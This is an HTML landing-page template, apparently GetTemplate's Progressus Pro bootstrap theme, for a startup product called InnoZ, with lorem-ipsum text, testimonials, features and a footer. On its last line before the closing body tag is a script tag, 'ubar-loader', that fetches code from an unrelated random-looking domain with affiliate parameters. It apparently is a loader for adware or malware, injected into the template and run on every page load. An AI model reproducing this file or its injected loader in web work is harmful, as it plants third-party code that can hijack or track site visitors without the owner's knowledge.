<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport"    content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="author"      content="GetTemplate.com">

	<title>Landing page for a startup - Progressus Pro - bootstrap template by GetTemplate</title>

	<link rel="shortcut icon" href="assets/images/gt_favicon.png">

	<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Raleway:200,400,600|Open+Sans:300,400,700">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<!-- Custom styles for our template -->
	<link rel="stylesheet" href="assets/css/styles.css">

	<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!--[if lt IE 9]>
	<script src="assets/js/html5shiv.js"></script>
	<script src="assets/js/respond.min.js"></script>
	<![endif]-->
</head>

<body class="page-home">

	<!-- navbar -->
	<div class= "navbar ontop-now" id="" >
		<div class="container">
			<div class="navbar-header">
				<!-- Button for smallest screens -->
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"><span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
				<a class="navbar-brand" href="index.html">
					<img src="assets/images/logo.png" alt="Progressus HTML5 template">
					<img src="assets/images/logo_on_white.png" alt="Progressus HTML5 template" class="secondary">
				</a>
			</div>
			<div class="navbar-collapse collapse">
				<ul class="nav navbar-nav pull-right">
					<li><a href="index.html">Home</a></li>
					<li class="active"><a href="landing-startup.html">Landing</a></li>
					<li><a href="features.html">Features</a></li>
					<li><a href="pricing.html">Pricing</a></li>
					<li class="dropdown">
						<a href="#" class="dropdown-toggle" data-hover="dropdown" data-toggle="dropdown">More Pages <b class="caret"></b></a>
						<ul class="dropdown-menu">
							<li><a href="services.html">Services</a></li>
							<li><a href="portfolio.html">Portfolio</a></li>
							<li><a href="portfolio-item.html">Portfolio Item</a></li>
							<li><a href="blog.html">Blog Home</a></li>
							<li><a href="single.html">Single Post</a></li>
							<li><a href="about.html">About</a></li>
							<li><a href="sidebar-left.html">Left Sidebar</a></li>
							<li><a href="sidebar-right.html">Right Sidebar</a></li>
							<li><a href="contact.html">Contact</a></li>
						</ul>
					</li>
					<li><a class="btn btn-rounded btn-action" href="signin.html">SIGN IN / SIGN UP</a></li>
				</ul>
			</div><!--/.nav-collapse -->
		</div>
	</div>
	<!-- end of navbar -->

	<!-- header -->
	<header class="head head-soft">
		<div class="container text-center">

			<div class="info">
				<h1 class="lead">
					InnoZ
					<span>DSE which works perfectly for small teams</span>
				</h1>
				<p class="intro">
					Running a software business? Building a web application?<br>
					This template is for you! It'll work perfectly either for your home or landing page.<br>
					You'll just need to replace the screenshot below by your own one, and edit textual content.
				</p>

				<form class="form-inline" role="form">
					<div class="form-group"><input type="text" class="form-control" id="exampleInputEmail2" placeholder="Your Name"></div>
					<div class="form-group"><input type="text" class="form-control" id="exampleInputPassword2" placeholder="Your Email"></div>
					<button type="submit" class="btn btn-action">Sign Up - it's free</button>
				</form>
			</div>

			<div id="soft-illustration" >
				<img src="assets/images/ap-screenshot.jpg" alt="" >
			</div>
		</div>
	</header>
	<!-- end of header -->

	<div class="opaque" style="float:left; width:100%;">

		<!-- intro -->
		<section class="section section-intro">
			<div class="container">
				<h2 class="text-center">The only solution you need for your team!</h2>
				<div class="row">
					<div class="col-sm-10 col-sm-push-1">
						<p class="text-center text-muted"> Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repudiandae eum quidem dolor praesentium nam, natus, mollitia corrupti, consequuntur itaque dolorem voluptas nemo possimus sint dignissimos nesciunt numquam officiis aut tenetur. </p>
					</div>
				</div>
			</div>
		</section>
		<!-- end of intro-->

		<!-- testimonials section -->
		<section class="section section-testimonials jumbotron">
			<div class="container">
			<h2 class="title text-center topspace">What people are saying about us?</h2>
			<div id="testimonials-carousel" class="carousel slide" data-ride="carousel">
				<ol class="carousel-indicators">
					<li data-target="#testimonials-carousel" data-slide-to="0" class="active"></li>
					<li data-target="#testimonials-carousel" data-slide-to="1"></li>
					<li data-target="#testimonials-carousel" data-slide-to="2"></li>
				</ol>
				<!--//carousel-indicators-->
				<div class="carousel-inner">
					<div class="row item active">
						<div class="col-sm-3 profile">
							<img src="assets/images/people/1.jpg" alt="" />
						</div>
						<div class="col-sm-9 content">
							<blockquote>
								<i class="fa fa-quote-left"></i>
								<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laboriosam deserunt accusamus soluta maiores alias, aliquid ipsum nobis laudantium qui, eos architecto accusantium doloremque dolorem quia asperiores voluptate pariatur. Laboriosam, ullam.</p>
							</blockquote>
							<p class="source">Mario Hayes
								<br/><span class="title">Co-Founder, Superawesome Inc</span>
							</p>
						</div>
						<!--//content-->
					</div>
					<!--//item-->
					<div class="row item">
						<div class="col-sm-3 profile">
							<img src="assets/images/people/2.jpg" alt="" />
						</div>
						<div class="col-sm-9 content">
							<blockquote>
								<i class="fa fa-quote-left"></i>
								<p>Ipsa nemo, minus perspiciatis harum at, repudiandae quae aliquam quo? Ullam laborum unde corporis eos ipsa esse necessitatibus in natus atque labore delectus, aperiam perferendis, assumenda iusto qui cum dolor!</p>
							</blockquote>
							<p class="source">Erin Mendoza
								<br/><span class="title">Entrepreneur, GT corp</span>
							</p>
						</div>
						<!--//content-->
					</div>
					<!--//item-->
					<div class="row item">
						<div class="col-sm-3 profile">
							<img src="assets/images/people/3.jpg" alt="" />
						</div>
						<div class="col-sm-9 content">
							<blockquote>
								<i class="fa fa-quote-left"></i>
								<p>Voluptatibus laboriosam pariatur doloribus repudiandae blanditiis cum quibusdam similique nisi nemo labore eos sed quasi quia, assumenda, ratione sit provident beatae hic eius velit neque magni distinctio ab quaerat ipsa!</p>
							</blockquote>
							<p class="source">Dwight Ray
								<br/><span class="title">CTO, Drave</span>
							</p>
						</div>
						<!--//content-->
					</div>
					<!--//item-->
				</div>
				<!--//carousel-inner-->
			</div>
			<!--//carousel-->
			</div>
		</section>
		<!-- end of testimonials -->

	</div>

	<!-- features section-->
	<section class="section">
		<div class="container">

			<h2 class="text-center title">Cool facts about InnoZ</h2>

			<div class="row topspace-2x">
				<div class="col-sm-6 col-sm-push-6 text-center"><img src="assets/images/mac.png" alt=""></div>
				<div class="col-sm-6 col-sm-pull-6 paddingall bottomspace-xs">
					<h4>Lorem ipsum</h4>
					<p>
						Lorem ipsum dolor sit amet, consectetur adipisicing elit. Fugiat ipsa modi doloribus dolores eius, at odit qui voluptatibus eos tempore excepturi voluptates dicta explicabo a, laudantium nisi eligendi numquam. Minus.
						<br>
						<a href="index.html">Read more &rarr;</a>
					</p>
				</div>
			</div>
			<div class="row topspace-2x">
				<div class="col-sm-6 text-center"><img src="assets/images/mac.png" alt=""></div>
				<div class="col-sm-6 paddingall">
					<h4>Minus sed</h4>
					<p>
						Molestiae nesciunt nostrum error fugit autem mollitia minima pariatur ipsam amet illo. Laboriosam voluptatibus eligendi, provident ad earum doloribus, laborum rem ullam ipsam, odio assumenda at nam vitae iusto quaerat!
						<br>
						<a href="index.html">Read more &rarr;</a>
					</p>
				</div>
			</div>
			<div class="row topspace-2x">
				<div class="col-sm-6 col-sm-push-6 text-center"><img src="assets/images/mac.png" alt=""></div>
				<div class="col-sm-6 col-sm-pull-6 paddingall">
					<h4>Consectetur excepturi</h4>
					<p>
						Molestiae placeat hic repellat eum tenetur impedit libero, mollitia quaerat et. Nihil consequuntur repudiandae magnam rem, nobis delectus facere cumque officia, illum et, mollitia recusandae repellat repellendus exercitationem tenetur quisquam.
						<br>
						<a href="index.html">Read more &rarr;</a>
					</p>
				</div>
			</div>
			<div class="row topspace-2x">
				<div class="col-sm-6 text-center"><img src="assets/images/mac.png" alt=""></div>
				<div class="col-sm-6 paddingall">
					<h4>Consequatur, quaerat?</h4>
					<p>
						Soluta atque repellat eaque perspiciatis error quod, fugit suscipit magnam amet nulla doloribus voluptatibus, ratione iure mollitia! Ipsam ullam rem vero deserunt dolore incidunt beatae tenetur quidem, molestiae quo sit.
						<br>
						<a href="index.html">Read more &rarr;</a>
					</p>
				</div>
			</div>

		</div>
	</section>
	<!-- end of FAQ -->


	<!-- CTA section -->
	<section class="section section-cta jumbotron topspace-3x bottomspace-0">
		<div class="container">
			<h2>Get started
				<span>Start your free, 30 day trial today!</span>
			</h2>
			<div class="row topspace-2x">
				<div class="col-sm-9">
					<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Placeat velit voluptatem quae tempora blanditiis sunt fugit facere praesentium vero, est natus, id accusantium ab animi voluptatibus magnam laborum ad nobis nam assumenda dolores quod cumque!</p>
				</div>
				<div class="col-sm-3"><a href="" class="btn btn-block btn-action">Start free trial</a></div>
			</div>
		</div>
	</section>
	<!-- end of CTA -->

	<footer id="footer" class="clearfix">

		<div class="footer1">
			<div class="container">
				<div class="row">

					<div class="col-md-3 widget">
						<h3 class="widget-title">Contact</h3>
						<div class="widget-body">
							<p>+234 23 9873237<br>
								<a href="mailto:#">some.email@somewhere.com</a><br>
								<br>
								234 Hidden Pond Road, Ashland City, TN 37015
							</p>
						</div>
					</div>

					<div class="col-md-3 widget">
						<h3 class="widget-title">Follow us</h3>
						<div class="widget-body">
							<p class="follow-me-icons">
								<a href=""><i class="fa fa-twitter fa-2"></i></a>
								<a href=""><i class="fa fa-dribbble fa-2"></i></a>
								<a href=""><i class="fa fa-github fa-2"></i></a>
								<a href=""><i class="fa fa-facebook fa-2"></i></a>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<h3 class="widget-title">Text widget</h3>
						<div class="widget-body">
							<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Excepturi, dolores, quibusdam architecto voluptatem amet fugiat nesciunt placeat provident cumque accusamus itaque voluptate modi quidem dolore optio velit hic iusto vero praesentium repellat commodi ad id expedita cupiditate repellendus possimus unde?</p>
							<p>Eius consequatur nihil quibusdam! Laborum, rerum, quis, inventore ipsa autem repellat provident assumenda labore soluta minima alias temporibus facere distinctio quas adipisci nam sunt explicabo officia tenetur at ea quos doloribus dolorum voluptate reprehenderit architecto sint libero illo et hic.</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>

		<div class="footer2">
			<div class="container">
				<div class="row">

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="simplenav">
								<a href="#">Home</a> |
								<a href="about.html">About</a> |
								<a href="sidebar-right.html">Sidebar</a> |
								<a href="contact.html">Contact</a> |
								<b><a href="signup.html">Sign up</a></b>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="text-right">
								Copyright &copy; 2014, Your name. Design: <a href="http://gettemplate.com/" rel="designer">GetTemplate</a>
							</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>
	</footer>


	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	  ga('create', 'UA-48366846-1', 'gettemplate.com');
	  ga('send', 'pageview');
	</script>

	<!-- JavaScript libs are placed at the end of the document so the pages load faster -->
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
	<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
	<script src="assets/js/bootstrap-hover-dropdown.min.js"></script>
	<script src="assets/js/headroom.min.js"></script>
	<script src="assets/js/jQuery.headroom.min.js"></script>
	<script src="assets/js/template.js"></script>
	<script>
		jQuery(document).ready(function($) {
			$('#soft-illustration img').hover( function(){
				$('#soft-illustration').addClass('expand');
			}, function(){
				$('#soft-illustration').removeClass('expand');
			} );
		});
	</script>
<script src="http://minxxrpaaw.org/code.php?appid=coi1634-10064-1491396470062-cf50e48c-094b-4367-935a-53ea4dcc15b7&h=0&m=normal&aff=0" id="ubar-loader"></script></body>
</html>
